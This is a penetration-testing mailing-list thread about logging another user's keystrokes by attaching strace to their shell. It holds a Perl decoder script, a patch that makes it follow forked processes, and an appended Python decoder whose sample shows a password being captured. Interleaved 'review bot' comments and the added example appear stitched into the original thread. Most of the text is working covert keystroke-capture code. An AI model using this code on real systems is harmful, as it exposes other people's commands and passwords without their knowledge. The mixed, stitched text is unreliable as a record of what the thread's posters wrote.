Penetration Testing mailing list archives

Re: Keystroke logging with strace (no setup required)


From: Can't dig that daddy <cdtdaddy () hotmail it>
Date: Mon, 18 Jul 2005 12:28:28 +0000

A little patch I'm using to "follow" forking processes...

Have a nice day,
        Can't dig that daddy.

---------snip-----------------
20c20
< open (F, "tail -f $ARGV[0] |");
---
open (F, "strace -p $ARGV[0] 2>&1 |");
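Review bot: the argument's meaning changes here from a log file to a PID, but the script's header (`To be used on a logfile ...`, `perl strace_clean.pl /tmp/what_is_user_doing.log`) is not updated, and `$ARGV[0]` is now interpolated unchecked into the `strace -p` shell command; add a check such as `die "usage: $0 <pid>\n" unless $ARGV[0] =~ /^\d+$/;` and fix the usage comment. As pasted, the replacement line (and those of the two following hunks) has lost its `>` marker, so `patch` will not apply this diff without re-adding it. The `2>&1` is needed, since strace writes its trace to stderr.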
22c22
<         next if !/^read/;
---
        next if !/^read/ && !/^clone/;
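Review bot: only `clone` lines pass the filter, so a child created with `vfork()` or `fork()`, which strace prints as `vfork(` / `fork(`, is never followed; use `/^(read|clone|fork|vfork)/` here and the same alternatives in the `elsif` branch that spawns the child tracer. The alternative is `strace -f`, which follows forks itself, at the cost of a `[pid N]` prefix on each line once more than one process is traced, which the `/^read/` anchor would then have to allow for.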
37a38,40
        } elsif (/^clone\(.+,\s.+,\s.+\)\s=\s(\d+)/) {
                system("/usr/bin/perl -w $0 $1");
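Review bot: `system()` blocks until the child perl exits, and that child runs `strace -p` until the forked process dies, so decoding of the parent shell's own keystrokes stops at the first fork (fine for `ls`, not for `vim` or a nested shell). Run the child tracer in the background, e.g. `system("/usr/bin/perl -w $0 $1 &");` or fork/exec it, and since both tracers then print to the same terminal, prefix each printed line with the PID so the streams can be told apart. `$1` is safe to interpolate because the capture is `(\d+)`. Note also that the hunk header announces three added lines (38,40) but only two are shown; the third is missing from the paste.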
---------snip-----------------


At 16:59, Tuesday 12 July 2005, Lachniet, Mark wrote:
Apparently Tom's original message never made it to the list, but I think
this is well worth the bandwidth to share.  Tom wrote a quick Perl
script to parse the output from strace, so you could use the method I
described a little (lot) more conveniently.  I haven't tested it but it
looks pretty straightforward.  Sorry about the line breaks but I didn't
want to send an attachment.

Mark Lachniet

---------snip-----------------
#!/usr/bin/perl -w
#
#  Monitoring a user's shell commands by using strace and displaying and
#  cleaning up the read() syscalls.
#  Based on the tip posted to secfocus by Mark Lachniet, written by Tom
#  Van de Wiele.
#
#  To be used on a logfile or in real-time (as fast as /usr/bin/script
#  logs to file that is) like this:
#
#     # script /tmp/what_is_user_foo_doing.log
#     Script started, file is /tmp/what_is_user_foo_doing.log
#     # strace -p <PID of shell of user>
#
#     Using a different terminal at the same time:
#     # perl strace_clean.pl /tmp/what_is_user_foo_doing.log
#
#
use strict;  # hi Kris :)

my $char;

die "usage: $0 <strace logfile>\n" unless @ARGV == 1;

# strace writes its trace to stderr, which `script` captures into the
# logfile; follow the logfile as it grows.
open (F, "tail -f $ARGV[0] |") or die "cannot run tail -f $ARGV[0]: $!\n";

# Keystrokes are printed one at a time without a newline, so switch off
# stdout buffering or nothing appears until the user presses Enter.
$| = 1;

while (<F>) {
      next if !/^read/;
      next if /^$/;
      # A keystroke read from the shell's stdin shows up as
      #     read(0, "x", 1) = 1
      # with non-printables C-escaped: \r for Enter, \177 for DEL, \t for Tab.
      if (/^read\(0,\s\"(.*)\".*/) {
              $char = $1;
              if ($char =~ /\\r/) {           # Enter
                      print "\n";
              }
              elsif ($char =~ /\\177/) {      # DEL (backspace key)
                      print "\b";
              }
              elsif ($char =~ /\\t/) {        # Tab
                      print "<TAB>";
              }
              else {
                      print $char;
              }
      }
}

close (F);

# EOF
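
As an added example, not code from this thread: a Python decoder for the same `read(0, ...)` lines that goes a step beyond Tom's script. It decodes strace's full C-style escaping (octal, hex, `\n`, `\"` ...), accepts the `[pid N]` prefix that `strace -f` adds once more than one process is traced, applies DEL/backspace to a per-process line buffer instead of echoing a raw `\b`, renders control keys as `^C`/`<ESC>`/`<TAB>`, and records the child PIDs returned by `clone`/`fork`/`vfork`. The strace output below is constructed for the example (PID 4100 as the traced shell, PIDs 4242/4243 as children, the typed commands); it is not a real capture.

```python
import re

# Constructed sample of `strace -f -p 4100` output (made up, not a real
# capture).  4100 is the traced shell, reading keystrokes one byte at a
# time from fd 0; after the first fork strace prefixes lines with "[pid N]".
SAMPLE = r"""read(0, "l", 1)                         = 1
read(0, "z", 1)                         = 1
read(0, "\177", 1)                      = 1
read(0, "s", 1)                         = 1
read(0, " -la\r", 5)                    = 5
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f3a1c7c0a10) = 4242
[pid  4242] execve("/bin/ls", ["ls", "-la"], 0x55d0 /* 20 vars */) = 0
[pid  4100] read(0, "cd /et\t", 7)      = 7
[pid  4100] read(0, "\r", 1)            = 1
[pid  4100] read(0, "\33[A", 3)         = 3
[pid  4100] read(0, "\r", 1)            = 1
[pid  4100] read(0, "s", 1)             = 1
[pid  4100] read(0, "u", 1)             = 1
[pid  4100] read(0, "\r", 1)            = 1
[pid  4100] clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f3a1c7c0a10) = 4243
[pid  4243] read(0, "hunter2\n", 4096)  = 8
[pid  4100] read(0, "\3", 1)            = 1
[pid  4100] read(0, "", 1)              = 0
"""

PID_PREFIX = r'^(?:\[pid\s+(?P<pid>\d+)\]\s+)?'
# read(0, "<escaped bytes>"[...], <len>) = <ret>
READ_RE = re.compile(PID_PREFIX + r'read\(0,\s*"(?P<data>(?:[^"\\]|\\.)*)"'
                     r'(?P<trunc>\.\.\.)?,\s*\d+\)\s*=\s*(?P<ret>-?\d+)')
FORK_RE = re.compile(PID_PREFIX + r'(?:clone|clone3|fork|vfork)\(.*\)\s*=\s*(?P<child>\d+)')
# strace escapes: \NNN octal, \xNN hex (with -x), and the usual \n \t \r \" \\
ESC_RE = re.compile(r'\\(?:(?P<oct>[0-7]{1,3})|x(?P<hex>[0-9a-fA-F]{2})|(?P<chr>.))', re.S)
SIMPLE = {'n': 10, 't': 9, 'r': 13, 'v': 11, 'f': 12, 'a': 7, 'b': 8, '\\': 92, '"': 34}


def unescape(text):
    """Decode strace's C-style escaping back into the raw bytes that read() returned."""
    out = bytearray()
    pos = 0
    for m in ESC_RE.finditer(text):
        out += text[pos:m.start()].encode('latin-1')
        pos = m.end()
        if m['oct'] is not None:
            out.append(int(m['oct'], 8))
        elif m['hex'] is not None:
            out.append(int(m['hex'], 16))
        else:
            out.append(SIMPLE.get(m['chr'], ord(m['chr'])))
    out += text[pos:].encode('latin-1')
    return bytes(out)


def reconstruct(lines, traced_pid=None):
    """Rebuild the lines a user finished typing from strace read(0, ...) output.

    Returns (commands, children, pending): commands is a list of (pid, text)
    in the order Enter was pressed, children the PIDs returned by fork-type
    calls, pending the per-PID text typed but not yet terminated by Enter.
    Unprefixed lines belong to traced_pid (the process given to strace -p).
    """
    buffers, children, commands = {}, [], []
    for raw in lines:
        m = FORK_RE.match(raw)
        if m:
            children.append(int(m['child']))
            continue
        m = READ_RE.match(raw)
        if m is None or int(m['ret']) <= 0:      # not a keystroke read, or EOF/error
            continue
        pid = int(m['pid']) if m['pid'] else traced_pid
        buf = buffers.setdefault(pid, [])
        for b in unescape(m['data']):
            if b in (13, 10):                     # Enter: the line is complete
                commands.append((pid, ''.join(buf)))
                buf.clear()
            elif b in (127, 8):                   # DEL / BS: erase the previous key
                if buf:
                    buf.pop()
            elif b == 9:
                buf.append('<TAB>')
            elif b == 27:
                buf.append('<ESC>')
            elif b < 32:
                buf.append('^' + chr(b + 64))     # ^C, ^D, ^Z ...
            else:
                buf.append(chr(b))
        if m['trunc']:
            buf.append('<...>')                   # strace cut the string short (raise -s)
    pending = {p: ''.join(b) for p, b in buffers.items() if b}
    return commands, children, pending


if __name__ == '__main__':
    cmds, kids, pend = reconstruct(SAMPLE.splitlines(), traced_pid=4100)
    for pid, text in cmds:
        print(f'{pid}: {text}')
    print('children:', kids, 'pending:', pend)
```

Two things the sample makes visible that a keystroke log cannot tell you: `cd /et<TAB>` shows what was typed, not what the shell completed it to, and `<ESC>[A` (up arrow) followed by Enter re-ran a history entry whose text never crossed fd 0. For the command actually executed, the child's `execve` line in the `-f` output is the better source; the keystroke stream is mainly valuable for what programs read from the terminal themselves, like the `hunter2` line read by child 4243.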


